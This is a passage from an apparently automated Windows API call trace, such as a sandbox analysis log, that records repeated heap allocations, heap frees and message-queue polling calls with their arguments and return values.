RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0136.680] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0136.680] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0136.680] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0136.680] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0136.681] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0136.681] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0136.682] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0136.682] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0136.683] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0136.683] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.683] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0136.684] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0136.685] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0136.685] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0136.685] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0136.686] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0136.686] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0136.687] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0136.687] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0136.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0136.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0136.687] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0136.687] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0136.688] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0136.688] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0136.688] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0136.688] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0136.689] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0136.689] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0136.690] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0136.690] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0136.690] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0136.690] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0136.691] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0136.691] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0136.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0136.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0136.691] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6698 [0136.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6698 | out: hHeap=0x12c0000) returned 1 [0136.692] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.692] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001a8 [0136.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6770 [0136.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6710 [0136.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6710 | out: hHeap=0x12c0000) returned 1 [0136.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6770 | out: hHeap=0x12c0000) returned 1 [0136.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001a8 | out: hHeap=0x12c0000) returned 1 [0136.692] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13002e8 [0136.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0136.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0136.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13002e8 | out: hHeap=0x12c0000) returned 1 [0136.693] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0136.693] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0136.694] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0136.694] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.696] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0136.696] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0136.696] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) 